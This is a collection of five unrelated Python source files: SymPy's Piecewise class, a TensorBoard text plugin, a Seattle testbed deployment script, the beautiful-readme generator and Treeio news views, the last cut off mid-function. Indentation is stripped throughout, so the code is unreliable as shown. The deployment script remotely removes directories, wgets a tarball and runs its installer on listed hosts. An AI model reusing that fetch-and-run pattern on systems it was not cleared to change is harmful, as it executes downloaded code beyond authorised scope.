"""Represents an expression, condition pair."""
def __new__(cls, expr, cond, **assumptions):
expr = sympify(expr)
cond = sympify(cond)
return Basic.__new__(cls, expr, cond, **assumptions)
@property
def expr(self):
return self.args[0]
@property
def cond(self):
return self.args[1]
def __iter__(self):
yield self.expr
yield self.cond
class Piecewise(Function):
"""
Represents a piecewise function.
Usage
=====
Piecewise( (expr,cond), (expr,cond), ... )
- Each argument is a 2-tuple defining a expression and condition
- The conds are evaluated in turn returning the first that is True.
If any of the evaluated conds are not determined explicitly False,
e.g. x < 1, the function is returned in symbolic form.
- If the function is evaluated at a place where all conditions are False,
a ValueError exception will be raised.
- Pairs where the cond is explicitly False, will be removed.
Examples
========
>>> from sympy import *
>>> x = Symbol('x')
>>> f = x**2
>>> g = log(x)
>>> p = Piecewise( (0, x<-1), (f, x<=1), (g, True))
>>> p.subs(x,1)
1
>>> p.subs(x,5)
log(5)
"""
nargs=None
def __new__(cls, *args, **options):
# Check types first
for ec in args:
if not isinstance(ec, tuple) or len(ec) != 2:
raise TypeError, "args may only include (expr, cond) pairs"
cond_type = type(ec[1])
if not (cond_type is bool or issubclass(cond_type, Relational) or \
issubclass(cond_type, Number)):
raise TypeError, \
"Cond %s is of type %s, but must be a bool," \
" Relational or Number" % (ec[1], cond_type)
# sympify args
args = map(lambda x:ExprCondPair(*x), args)
r = cls.eval(*args)
if r is None:
return Basic.__new__(cls, *args, **options)
else:
return r
def __getnewargs__(self):
# Convert ExprCondPair objects to tuples.
args = []
for expr, condition in self.args:
args.append((expr, condition))
return tuple(args)
@classmethod
@deprecated
def canonize(cls, *args):
return cls.eval(*args)
@classmethod
def eval(cls, *args):
# Check for situations where we can evaluate the Piecewise object.
# 1) Hit an unevaluatable cond (e.g. x<1) -> keep object
# 2) Hit a true condition -> return that expr
# 3) Remove false conditions, if no conditions left -> raise ValueError
all_conds_evaled = True
non_false_ecpairs = []
for expr, cond in args:
cond_eval = cls.__eval_cond(cond)
if cond_eval is None:
all_conds_evaled = False
non_false_ecpairs.append( (expr, cond) )
elif cond_eval:
if all_conds_evaled:
return expr
non_false_ecpairs.append( (expr, cond) )
if len(non_false_ecpairs) != len(args):
return Piecewise(*non_false_ecpairs)
# Count number of arguments.
nargs = 0
for expr, cond in args:
if hasattr(expr, 'nargs'):
nargs = max(nargs, expr.nargs)
elif hasattr(expr, 'args'):
nargs = max(nargs, len(expr.args))
if nargs:
cls.narg = nargs
return None
def doit(self, **hints):
return Piecewise(*[(e.doit(), c.doit()) for e, c in self.args])
def _eval_integral(self,x):
from sympy.integrals import integrate
return Piecewise(*[(integrate(e, x), c) for e, c in self.args])
def _eval_interval(self, sym, a, b):
"""Evaluates the function along the sym in a given interval ab"""
# FIXME: Currently only supports conds of type sym < Num, or Num < sym
int_expr = []
mul = 1
if a > b:
a, b, mul = b, a, -1
default = None
# Determine what intervals the expr,cond pairs affect.
# 1) If cond is True, then log it as default
# 1.1) Currently if cond can't be evaluated, throw NotImplentedError.
# 2) For each inequality, if previous cond defines part of the interval
# update the new conds interval.
# - eg x < 1, x < 3 -> [oo,1],[1,3] instead of [oo,1],[oo,3]
# 3) Sort the intervals to make it easier to find correct exprs
for expr, cond in self.args:
if isinstance(cond, bool) or cond.is_Number:
if cond:
default = expr
break
else:
continue
curr = list(cond.args)
if cond.args[0] == sym:
curr[0] = S.NegativeInfinity
elif cond.args[1] == sym:
curr[1] = S.Infinity
else:
raise NotImplementedError, \
"Currently only supporting evaluation with only " \
"sym on one side of the relation."
curr = [max(a, curr[0]), min(b, curr[1])]
for n in xrange(len(int_expr)):
if self.__eval_cond(curr[0] < int_expr[n][1]) and \
self.__eval_cond(curr[0] >= int_expr[n][0]):
curr[0] = int_expr[n][1]
if self.__eval_cond(curr[1] > int_expr[n][0]) and \
self.__eval_cond(curr[1] <= int_expr[n][1]):
curr[1] = int_expr[n][0]
if self.__eval_cond(curr[0] < curr[1]):
int_expr.append(curr + [expr])
int_expr.sort(key=lambda x:x[0])
# Add holes to list of intervals if there is a default value,
# otherwise raise a ValueError.
holes = []
curr_low = a
for int_a, int_b, expr in int_expr:
if curr_low < int_a:
holes.append([curr_low, min(b, int_a), default])
curr_low = int_b
if curr_low > b:
break
if holes and default != None:
int_expr.extend(holes)
elif holes and default == None:
raise ValueError, "Called interval evaluation over piecewise " \
"function on undefined intervals %s" % \
", ".join([str((h[0], h[1])) for h in holes])
# Finally run through the intervals and sum the evaluation.
ret_fun = 0
for int_a, int_b, expr in int_expr:
ret_fun += expr._eval_interval(sym, max(a, int_a), min(b, int_b))
return mul * ret_fun
def _eval_derivative(self, s):
return Piecewise(*[(diff(e, s), c) for e, c in self.args])
def _eval_subs(self, old, new):
if self == old:
return new
new_args = []
for e, c in self.args:
if isinstance(c, bool):
new_args.append((e._eval_subs(old, new), c))
else:
new_args.append((e._eval_subs(old, new), c._eval_subs(old, new)))
return Piecewise( *new_args )
@classmethod
def __eval_cond(cls, cond):
"""Returns S.One if True, S.Zero if False, or None if undecidable."""
if type(cond) == bool or cond.is_number or (cond.args[0].is_Number and cond.args[1].is_Number):
if cond: return S.One
return S.Zero
return None
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Text plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import textwrap
# pylint: disable=g-bad-import-order
# Necessary for an internal test with special behavior for numpy.
import numpy as np
# pylint: enable=g-bad-import-order
import tensorflow as tf
from werkzeug import wrappers
from tensorboard import plugin_util
from tensorboard.backend import http_util
from tensorboard.plugins import base_plugin
from tensorboard.plugins.text import metadata
# HTTP routes
TAGS_ROUTE = '/tags'
TEXT_ROUTE = '/text'
WARNING_TEMPLATE = textwrap.dedent("""\
**Warning:** This text summary contained data of dimensionality %d, but only \
2d tables are supported. Showing a 2d slice of the data instead.""")
def make_table_row(contents, tag='td'):
"""Given an iterable of string contents, make a table row.
Args:
contents: An iterable yielding strings.
tag: The tag to place contents in. Defaults to 'td', you might want 'th'.
Returns:
A string containing the content strings, organized into a table row.
Example: make_table_row(['one', 'two', 'three']) == '''
<tr>
<td>one</td>
<td>two</td>
<td>three</td>
</tr>'''
"""
columns = ('<%s>%s</%s>\n' % (tag, s, tag) for s in contents)
return '<tr>\n' + ''.join(columns) + '</tr>\n'
def make_table(contents, headers=None):
"""Given a numpy ndarray of strings, concatenate them into a html table.
Args:
contents: A np.ndarray of strings. May be 1d or 2d. In the 1d case, the
table is laid out vertically (i.e. row-major).
headers: A np.ndarray or list of string header names for the table.
Returns:
A string containing all of the content strings, organized into a table.
Raises:
ValueError: If contents is not a np.ndarray.
ValueError: If contents is not 1d or 2d.
ValueError: If contents is empty.
ValueError: If headers is present and not a list, tuple, or ndarray.
ValueError: If headers is not 1d.
ValueError: If number of elements in headers does not correspond to number
of columns in contents.
"""
if not isinstance(contents, np.ndarray):
raise ValueError('make_table contents must be a numpy ndarray')
if contents.ndim not in [1, 2]:
raise ValueError('make_table requires a 1d or 2d numpy array, was %dd' %
contents.ndim)
if headers:
if isinstance(headers, (list, tuple)):
headers = np.array(headers)
if not isinstance(headers, np.ndarray):
raise ValueError('Could not convert headers %s into np.ndarray' % headers)
if headers.ndim != 1:
raise ValueError('Headers must be 1d, is %dd' % headers.ndim)
expected_n_columns = contents.shape[1] if contents.ndim == 2 else 1
if headers.shape[0] != expected_n_columns:
raise ValueError('Number of headers %d must match number of columns %d' %
(headers.shape[0], expected_n_columns))
header = '<thead>\n%s</thead>\n' % make_table_row(headers, tag='th')
else:
header = ''
n_rows = contents.shape[0]
if contents.ndim == 1:
# If it's a vector, we need to wrap each element in a new list, otherwise
# we would turn the string itself into a row (see test code)
rows = (make_table_row([contents[i]]) for i in range(n_rows))
else:
rows = (make_table_row(contents[i, :]) for i in range(n_rows))
return '<table>\n%s<tbody>\n%s</tbody>\n</table>' % (header, ''.join(rows))
def reduce_to_2d(arr):
"""Given a np.npdarray with nDims > 2, reduce it to 2d.
It does this by selecting the zeroth coordinate for every dimension greater
than two.
Args:
arr: a numpy ndarray of dimension at least 2.
Returns:
A two-dimensional subarray from the input array.
Raises:
ValueError: If the argument is not a numpy ndarray, or the dimensionality
is too low.
"""
if not isinstance(arr, np.ndarray):
raise ValueError('reduce_to_2d requires a numpy.ndarray')
ndims = len(arr.shape)
if ndims < 2:
raise ValueError('reduce_to_2d requires an array of dimensionality >=2')
# slice(None) is equivalent to `:`, so we take arr[0,0,...0,:,:]
slices = ([0] * (ndims - 2)) + [slice(None), slice(None)]
return arr[slices]
def text_array_to_html(text_arr):
"""Take a numpy.ndarray containing strings, and convert it into html.
If the ndarray contains a single scalar string, that string is converted to
html via our sanitized markdown parser. If it contains an array of strings,
the strings are individually converted to html and then composed into a table
using make_table. If the array contains dimensionality greater than 2,
all but two of the dimensions are removed, and a warning message is prefixed
to the table.
Args:
text_arr: A numpy.ndarray containing strings.
Returns:
The array converted to html.
"""
if not text_arr.shape:
# It is a scalar. No need to put it in a table, just apply markdown
return plugin_util.markdown_to_safe_html(
text_arr.astype(np.dtype(str)).tostring())
warning = ''
if len(text_arr.shape) > 2:
warning = plugin_util.markdown_to_safe_html(WARNING_TEMPLATE
% len(text_arr.shape))
text_arr = reduce_to_2d(text_arr)
html_arr = [plugin_util.markdown_to_safe_html(x)
for x in text_arr.reshape(-1)]
html_arr = np.array(html_arr).reshape(text_arr.shape)
return warning + make_table(html_arr)
def process_string_tensor_event(event):
"""Convert a TensorEvent into a JSON-compatible response."""
string_arr = tf.make_ndarray(event.tensor_proto)
html = text_array_to_html(string_arr)
return {
'wall_time': event.wall_time,
'step': event.step,
'text': html,
}
class TextPlugin(base_plugin.TBPlugin):
"""Text Plugin for TensorBoard."""
plugin_name = metadata.PLUGIN_NAME
def __init__(self, context):
"""Instantiates TextPlugin via TensorBoard core.
Args:
context: A base_plugin.TBContext instance.
"""
self._multiplexer = context.multiplexer
def index_impl(self):
# A previous system of collecting and serving text summaries involved
# storing the tags of text summaries within tensors.json files. See if we
# are currently using that system. We do not want to drop support for that
# use case.
run_to_series = collections.defaultdict(list)
name = 'tensorboard_text'
run_to_assets = self._multiplexer.PluginAssets(name)
for run, assets in run_to_assets.items():
if 'tensors.json' in assets:
tensors_json = self._multiplexer.RetrievePluginAsset(
run, name, 'tensors.json')
tensors = json.loads(tensors_json)
run_to_series[run] = tensors
else:
run_to_series[run] = []
# TensorBoard is obtaining summaries related to the text plugin based on
# SummaryMetadata stored within Value protos.
mapping = self._multiplexer.PluginRunToTagToContent(metadata.PLUGIN_NAME)
# Augment the summaries created via the deprecated (plugin asset based)
# method with these summaries created with the new method. When they
# conflict, the summaries created via the new method overrides.
for (run, tags) in mapping.items():
run_to_series[run] += tags.keys()
return run_to_series
@wrappers.Request.application
def tags_route(self, request):
# Map from run to a list of tags.
response = {
run: tag_listing
for (run, tag_listing) in self.index_impl().items()
}
return http_util.Respond(request, response, 'application/json')
def text_impl(self, run, tag):
try:
text_events = self._multiplexer.Tensors(run, tag)
except KeyError:
text_events = []
responses = [process_string_tensor_event(ev) for ev in text_events]
return responses
@wrappers.Request.application
def text_route(self, request):
run = request.args.get('run')
tag = request.args.get('tag')
response = self.text_impl(run, tag)
return http_util.Respond(request, response, 'application/json')
def get_plugin_apps(self):
return {
TAGS_ROUTE: self.tags_route,
TEXT_ROUTE: self.text_route,
}
def is_active(self):
"""Determines whether this plugin is active.
This plugin is only active if TensorBoard sampled any text summaries.
Returns:
Whether this plugin is active.
"""
return bool(self._multiplexer and any(self.index_impl().values()))
| |
"""
<Program Name>
missing_seattle_install_p.py
<Started>
June 2009
<Author>
n2k8000@u.washington.edu
Konstantin Pik
<Purpose>
This file will read in a list file passed into it, and from that list it
will install seattle on all of those nodes. The list file is to be in the
file format specified for .LIST files (!user:[username], followed by list of
IPs).
<Usage>
python missing_seattle_install.py missing.list
Note: missing.list is the default file name.
"""
import thread
import time
import sys
# for remote_shellexec
import deploy_network
import deploy_threading
import parallelize_repy
# the running thread counter
thread_counter = 0
# the lock on the thread_counter, just to make sure add/sub is atomic
thread_lock = thread.allocate_lock()
def get_remote_hosts_from_file(fname = 'missing.list'):
"""
<Purpose>
Returns a list of the IP as read from file specified.
File format is:
!user:[username]
[IPs]
[username] is the username that will be used until a new $username is
specified in the same format. NOTE: Username is case sensitive.
[IPs] are a list of IPs/hostname (one per line) associated with that
username
<Arguments>
fname:
Optional. The filename containing the IPs of the remote machines. File
must be in the same directory as this script.
<Exceptions>
Catches a thrown exception if the IP file is not found.
<Side Effects>
None.
<Returns>
Returns a list of tuples with (username, ip) on success, False on failure
"""
# IP file must be in the same dir as this script
try:
file_of_ips = open(fname, 'r')
except Exception, e:
print 'Error: Are you missing your list of remote hosts? ('+str(e)+')'
file_of_ips.close()
return False
else:
# flag on whether we have any remote hosts (there are users, and comments
# in the file as well
have_one_ip = False
# initialize dict
users_ip_tuple_list = []
current_username = ''
# Python docs suggest doing this instead of reading in whole file into mem:
for line in file_of_ips:
# if first chars match what we want ('!user:' is 6 chars long)
if line[0:6].lower() == '!user:':
# grab everything after the '!user:' string
# -1 so we drop the \n and leading/trailing spaces
current_username = line[6:-1].strip()
else:
# ignore blank lines and spaces
if line.strip('\n '):
# and ignore comments (lines starting with #)
if line.strip('\n ')[0] != '#':
# if we get here, then we have an IP so we need to check that
# user is not empty.. log err if it is and complain.
if not current_username:
print 'Critical Error: No username specified for remote host group!'
file_of_ips.close()
return False
# add (username, remote_host) pair
users_ip_tuple_list.append((current_username, line.rstrip('\n ')))
# set flag that we have at least one ip
have_one_ip = True
# return true only if we have at least ONE ip that we added to the list
# and not just a bunch of users
if have_one_ip:
# lets make the list a set, which is a cheap way of getting rid of
# duplicates, then cast back to list.
finalized_list = list(set(users_ip_tuple_list))
print "Found "+str(len(finalized_list))+" unique hosts to connect to."
file_of_ips.close()
return finalized_list
file_of_ips.close()
return False
def format_print(out, err):
"""
<Purpose>
Will print out the non-empty out/err strings once they're properly
formatted. Intended to format stdout and stderr. Also will print to
missing.log
<Arguments>
out:
stdout
err:
std error
<Exceptions>
None.
<Side Effects>
None.
<Returns>
None.
"""
try:
out = out.strip('\n\r ')
err = err.strip('\n\r ')
logfilehandle = open('missing.log', 'a')
if out:
print out
logfilehandle.write(out+'\n')
if err:
print err
logfilehandle.write(err+'\n')
logfilehandle.close()
except Exception, e:
print 'Error while writing file and/or formatting data'
print e
return
def worker(username_host_tuple):
"""
<Purpose>
Worker thread that makes calls to remote_shellexec
<Arguments>
username_host_tuple:
username_host_tuple[0] is
username:
the username to log in as
username_host_tuple[1] is
host:
the remote hostname/ip to install on.
<Exceptions>
None.
<Side Effects>
None.
<Returns>
None.
"""
username = 'uw_seattle' #username_host_tuple[0]
host = username_host_tuple
# build up a command string that'll download and install seattle
cmd_list = []
# 1. Remove old file, and download the file
cmd_list.append('cd seattle_repy; ./uninstall.sh; cd ~; rm -rf seattle_repy')
cmd_list.append('rm -rf seattle_linux.tgz')
cmd_list.append('wget https://seattlegeni.cs.washington.edu/geni/download/flibble/seattle_linux.tgz')
#cmd_list.append('wget --no-check-certificate https://blackbox.cs.washington.edu/geni/html/tukwila/seattle_linux.tgz')
# 2. Untar
cmd_list.append('tar -xf seattle_linux.tgz')
# 3. Change into seattle_repy directory and execute python install.sh to start seattle
cmd_list.append('cd seattle_repy; ./install.sh > /dev/null 2> /dev/null < /dev/null&')
# merge into a command string
cmd_str = '; '.join(cmd_list)
out, err, retcode = deploy_network.remote_shellexec(cmd_str, username, host)
format_print(out, err)
def main():
"""
<Purpose>
Entry point into the program. Reads the hosts that need installing
from file and then starts the threads that will take care of downloading
and installing seattle. Then waits for all threads to finish. This takes
a while as an RSA key needs to be generated during each install.
<Arguments>
None
<Exceptions>
Possible exception when launching new threads.
<Side Effects>
None.
<Returns>
None.
"""
# start the timeout monitor thread
deploy_threading.init()
# the fn of the file that contains the list of nodes we'll be using
nodelist_fn = ''
# did we get a parameter passed in? if so that's our fn
if len(sys.argv) > 1:
nodelist_fn = sys.argv[1]
print 'Using '+nodelist_fn+' filename to read in hostnames'
else:
print 'Using default missing.list filename to read in hostnames'
# get hosts from file
#if nodelist_fn:
# hosts = get_remote_hosts_from_file(nodelist_fn)
#else: # use default fn
# hosts = get_remote_hosts_from_file()
# '128.208.1.130', 128.208.1.217
# or manually type in hosts here
hosts = [ ]
# if we have hostnames
if hosts:
# BEGIN
func_handle = parallelize_repy.parallelize_initfunction(hosts, worker, 10)
size = str(len(hosts))
while not parallelize_repy.parallelize_isfunctionfinished(func_handle):
results_dict = parallelize_repy.parallelize_getresults(func_handle)
print str(len(results_dict['aborted']))+' aborted, '+str(len(results_dict['exception']))+\
' exceptioned, '+str(len(results_dict['returned']))+' finished of '+size+' total.'
time.sleep(5)
deploy_threading.destroy()
# END
if __name__ == "__main__":
main()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Jan-Philip Gehrcke (http://gehrcke.de).
# See LICENSE file for details.
"""beautiful-readme.
"""
from __future__ import unicode_literals
import os
import re
import sys
import shutil
import urllib
import logging
import argparse
from collections import OrderedDict
from subprocess import Popen, PIPE
try:
import HTMLParser as htmlparser
except ImportError:
import html.parser as htmlparser
log = logging.getLogger()
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s,%(msecs)-6.1f - %(levelname)s: %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
log.addHandler(ch)
try:
import jinja2
except ImportError:
err("Missing dependency: cannot import jinja2.")
__version__ = "0.1.0"
# To be populated by argparse from cmdline arguments.
cmdlineopts = None
# To be popluated when executing config file.
config = {}
def main():
global markdown
global docutils
global conf
parse_options()
resdir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resources")
log.debug("Identified resource dir: %s", resdir)
if not os.path.isdir(resdir):
err("Cannot access identified resource dir: %s" % resdir)
log.info("Read config.")
exec_config_file(cmdlineopts.configfile)
try:
if config["converter"] == "markdown":
log.info("Importing markdown.")
import markdown
converter = MarkdownConverter()
elif config["converter"] == "docutils":
log.info("Importing docutils.")
import docutils.core
converter = DocutilsConverter()
else:
err("Config error: converter must be 'markdown' or 'docutils.")
except ImportError:
err("Missing dependency: cannort import %s." % config["converter"])
# (Re-)create build directory.
log.info("Create build directory.")
if os.path.isdir(config["builddir"]):
log.info("Purge previously existing build directory: %s",
config["builddir"])
shutil.rmtree(config["builddir"])
os.mkdir(config["builddir"])
# TODO: only do this if necessary (i.e. if CSS/JS resources required).
log.info("Copy static files to build dir.")
shutil.copytree(
os.path.join(resdir, "static"),
os.path.join(config["builddir"], "static"))
jinjaenv = jinja2.Environment(
loader=jinja2.FileSystemLoader(searchpath=resdir),
trim_blocks=False)
# Read basic HTML scaffold.
log.info("Read HTML template from %s", "index.html.tpl")
htmltemplate = jinjaenv.get_template("index.html.tpl")
sourceenc = "utf-8"
log.info("Read %s, decode with %s codec.",
cmdlineopts.readmefile, sourceenc)
if not os.path.isfile(cmdlineopts.readmefile):
err("Cannot find file: %s" % cmdlineopts.readmefile)
with open(cmdlineopts.readmefile, "rb") as f:
bodysource = f.read().decode(sourceenc)
log.info("Create document body: convert source to HTML.")
htmlbody = converter.process(bodysource)
# Filter body.
bodyfilter = []
if config["converter"] == "markdown":
bodyfilter.append(MarkdownTitleFilter())
for bfilter in bodyfilter:
htmlbody = bfilter.process(htmlbody)
# Modify body on the fly (populate h2 tags with with ids).
# Generate Table Of Contents HTML code on the fly.
htmlbody, toc = auto_toc_from_h2(htmlbody)
sidebar = config["sidebar"]
# Just don't include TOC HTML if not desired (modified h2 tags are still
# convenient).
if config["sidebar_toc"]:
log.info("Prepare sidebar TOC inclusion.")
sidebar = "%s\n%s" % (sidebar, toc)
else:
log.info("Do not include sidebar TOC.")
# Create HTML document: fill basic HTML template.
log.info("Create main HTML document (fill template).")
template_mapping = {
"title": config["title"],
"description": config["description"],
"body": htmlbody,
"about": config["about"],
"copyright": config["copyright"],
"sidebar": sidebar,
"google_analytics_id": config["google_analytics_id"],
"customcss": config["customcss"],
"attribution": config["attribution"],
}
htmlout = htmltemplate.render(**template_mapping)
# Write HTML document.
indexhtmlpath = os.path.join(config["builddir"], "index.html")
log.info("Write %s.", indexhtmlpath)
with open(indexhtmlpath, "wb") as f:
f.write(htmlout.encode("utf-8"))
def err(msg):
log.error(msg)
sys.exit(1)
class Converter(object):
def __init__(self):
pass
class DocutilsConverter(Converter):
"""
http://docutils.sourceforge.net/docs/api/publisher.html
"""
def process(self, doc):
return self._html_fragment(doc)
def _html_fragment(self, doc):
"""
Return 'fragment' part of docutils HTML document. `doc` is unicode RST
source.
Largely copied from
http://docutils.sourceforge.net/docutils/examples.py
Parameters used below:
- `source`: A multi-line text string; required.
- `source_path`: Path to the source file or object. Optional, but useful
for diagnostic output (system messages).
- `destination_path`: Path to the file or object which will receive the
output; optional. Used for determining relative paths (stylesheets,
source links, etc.).
- `input_encoding`: The encoding of `input_string`. If it is an encoded
8-bit string, provide the correct encoding. If it is a Unicode string,
use "unicode", the default.
- `doctitle_xform`: Disable the promotion of a lone top-level section
title to document title (and subsequent section title to document
subtitle promotion); enabled by default.
- `initial_header_level`: The initial level for header elements (e.g. 1
for "<h1>").
"""
overrides = {
'input_encoding': "unicode",
'doctitle_xform': True,
'initial_header_level': 2
}
parts = docutils.core.publish_parts(
source=doc,
source_path=None,
destination_path=None,
writer_name='html',
settings_overrides=overrides)
# "parts['fragment'] contains the document body (not the HTML <body>).
# In other words, it contains the entire document, less the document
# title, subtitle, docinfo, header, and footer."
return parts["fragment"]
class MarkdownConverter(Converter):
"""
https://pythonhosted.org/Markdown/reference.html
"""
def process(self, doc):
return markdown.markdown(
text=doc,
output_format="html5"
)
class BodyFilterError(Exception):
"""Error class for all kind of issues during body filtering."""
pass
class BodyFilter(object):
"""A filter for modifying the HTML code as returned by
rst2html or markdown.
"""
def __init__(self):
pass
def process(self, body):
"""_process must be implemented by children."""
if not body:
raise BodyFilterError("body is empty: %s" % body)
log.debug("Body is about to be filtered by %s.", self.__class__.__name__)
log.debug("Prefilter body length: %s", len(body))
b = self._process(body)
log.debug("Filter done. Postfilter body length: %s", len(b))
return b
class DocutilsTitleFilter(BodyFilter):
"""From the first line, remove <h1 class="title">xxx</h1> in case of RST,
and <h1>xxx</h1> in case of markdown.
This program adds its own title. Hence, if docutils also adds a
title, this filter removes it. Yes, in general we should not use
RegEx for filtering HTML. In this case, however, it's not *any*
HTML, it is *the* HTML as generated by docutils, and it is the
first line and the first tag in the document. So we really do not
anticipate the entire universe of HTML, and that's why RegEx is
fine.
"""
def _process(self, body):
bodylines = body.splitlines()
first = bodylines[0]
if not "h1" in first:
log.info("No h1 in first line of body. Skip.")
return body
match = re.search('<h1 class="title">.*</h1>', first)
if not match:
raise BodyFilterError("First line contains h1, but does not match pattern.")
log.info('First line contains docutils title (<h1 class="title">...</h1>). Remove.')
return "\n".join(bodylines[1:])
class MarkdownTitleFilter(BodyFilter):
"""From the first line, remove <h1>xxx</h1> in case of markdown.
The idea is to remove the heading of highest hierarchy level. It is expected
to be the document title which is added by this beautiful-readme anyway.
In case of docutils, this issue is solved differently: the title detection
is done by docutils itself and we don't request the title to be contained in
the HTML output.
TODO/expected problem: if original README does not have a clear title, i.e.
of headings in the original README are all on the same hierarchy level or
if the first heading shares its hierarchy level with another heading, then
this filter does not make sense, probably.
"""
def _process(self, body):
bodylines = body.splitlines()
first = bodylines[0]
if not "h1" in first:
log.info("No h1 in first line of body. Skip.")
return body
match = re.search('<h1>.*</h1>', first)
if not match:
raise BodyFilterError(
"First line contains h1, but does not match pattern.")
log.info('First line contains title (<h1>...</h1>). Remove.')
return "\n".join(bodylines[1:])
def heading_to_label(heading):
"""Generate anchor id ("label") for heading.
`heading` is the text between opening and closing h1 tag.
"""
log.debug("Convert heading '%r' to anchor id.", heading)
# First, decode HTML entities.
h = htmlparser.HTMLParser().unescape(heading)
log.debug("Unescaped heading: %r", h)
# Then, split at whitespace. Then get rid of all
# non-alphanumeric chars in each token.
# Then reconnect tokens with "-".
# Prepend "brtoc-" to ensure unique ids (any random string woud do).
cleantokens = (re.sub('[^0-9a-zA-Z]+', '', s).lower() for s in h.split())
return "brtoc-" + "-".join(t for t in cleantokens if t)
def auto_toc_from_h2(body):
label_heading_dict = OrderedDict()
def replace_heading(matchobj):
heading = matchobj.group(1)
label = heading_to_label(heading)
log.info("Found heading: %r", heading)
rpl = '<h2 id="%s">%s</h2>' % (label, heading)
log.info("Replacing with: %r", rpl)
# Save correspondence for later.
label_heading_dict[label] = heading
return rpl
log.info("Scanning body for <h2>*</h2>, replacing on the fly.")
body = re.sub("<h2>(.*)</h2>", replace_heading, body)
# Validation of anchors: should be unique!
# First check within the newly created labels.
labels = label_heading_dict.keys()
if len(set(labels)) != len(labels):
log.error("Duplicate headline. Must be unique, abort.")
sys.exit(1)
listitems = []
for label, heading in label_heading_dict.items():
listitems.append('<li><a href="#%s">%s</a></li>' % (label, heading))
# Produce some indentation.
listhtml = " " + "\n ".join(listitems)
log.debug("Generated the following toc list:\n%s", listhtml)
# Add class "brcontents" (br namespace stands for beautiful-readme).
prefix = ('<div class="sidebar-module sidebar-module-inset brcontents">\n'
' <h4>Contents</h4>\n'
' <ol class="list-unstyled">')
suffix = ' </ol>\n</div>'
toc = "\n".join([prefix, listhtml, suffix])
return body, toc
def parse_options():
desc = "Create a simple mobile-friendly static website from your README."
parser = argparse.ArgumentParser(
prog="beautiful-readme",
description=desc,
epilog="Version %s" % __version__,
add_help=False
)
parser.add_argument("-h", "--help", action="help",
help="Show help message and exit."
)
parser.add_argument("--version", action="version",
version=__version__, help="Show version information and exit."
)
parser.add_argument("-c", "--configfile", action="store",
default="brconfig.py",
help="Path to configuration file."
)
parser.add_argument("readmefile", action="store",
metavar="README",
help=("Path to a README file (reStructuredText or Markdown). Expected "
"encoding: UTF-8.")
)
global cmdlineopts
cmdlineopts = parser.parse_args()
def exec_config_file(cfgfilepath):
# http://stackoverflow.com/a/6357418/145400
# http://stackoverflow.com/a/8226090/145400
# https://bitbucket.org/birkenfeld/sphinx/src/1.2.2/sphinx/util/pycompat.py
if not os.path.isfile(cfgfilepath):
err("Cannot access configuration file: %s." % cfgfilepath)
global config
if sys.version < '3':
execfile(cfgfilepath, config)
else:
exec(
compile(open(cfgfilepath, "rb").read(), cfgfilepath, 'exec'),
config
)
if __name__ == "__main__":
main()
| |
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
News module: views
"""
from django.shortcuts import Http404
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from django.db.models import Q
from treeio.core.models import UpdateRecord, Module, Object, Widget
from treeio.core.rendering import render_to_response
from treeio.core.decorators import treeio_login_required, handle_response_format
from treeio.news.forms import UpdateRecordForm, UpdateRecordFilterForm
from treeio.core.rss import ObjectFeed
def _get_default_context(request):
"Preprocess context"
query = Q(name__icontains='account') | Q(name__icontains='news')
modules = request.user.profile.get_perspective().get_modules().exclude(query)
filters = UpdateRecordFilterForm(request.user.profile, request.GET)
context = {'modules': modules, 'filters': filters}
return context
def _get_filter_query(user, do_permissions=True, do_recipients=True, filters=None):
if filters is None:
filters = {}
is_admin = user.is_admin()
query = Q()
for arg in filters:
if hasattr(UpdateRecord, arg) and filters[arg]:
kwargs = {str(arg + '__id'): long(filters[arg])}
query = query & Q(**kwargs)
if do_permissions and not is_admin:
query = Q(about__isnull=True) | Q(about__full_access=user) | Q(
about__full_access__isnull=True)
query = query | Q(about__full_access=user.default_group) | Q(
about__full_access__in=user.other_groups.all())
query = query | Q(about__read_access=user)
query = query | Q(about__read_access=user.default_group) | Q(
about__read_access__in=user.other_groups.all())
modules = Object.filter_permitted(
user, user.get_perspective().get_modules())
if not len(modules) == Module.objects.all().count():
modquery = Q()
for module in modules:
modquery = modquery | Q(
about__object_type__contains=module.name)
query = query & modquery
if do_recipients:
if not is_admin:
query = query & ((~Q(author=user) | Q(record_type='share')) & (Q(recipients=user) |
Q(recipients__isnull=True) | Q(
recipients=user.default_group) |
Q(recipients__in=user.other_groups.all())))
else:
query = query & (Q(record_type='share') | (~Q(author=user) & (Q(recipients=user) |
Q(recipients__isnull=True) | Q(
recipients=user.default_group) | Q(recipients__in=user.other_groups.all()))))
return query
@handle_response_format
@treeio_login_required
def index(request, response_format='html'):
"Default index page"
profile = request.user.profile
query = _get_filter_query(profile, filters=request.GET)
updates = UpdateRecord.objects.filter(query).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save()
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('news_index'))
else:
form = UpdateRecordForm(user=profile)
if response_format == 'rss':
return ObjectFeed(title=_('All Activity'),
link=request.path,
description=_('Updates on activity in your Tree.io'),
objects=updates)(request)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/index', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def index_social(request, response_format='html'):
"Social Activity"
profile = request.user.profile
query = _get_filter_query(
profile, filters=request.GET) & Q(record_type='share')
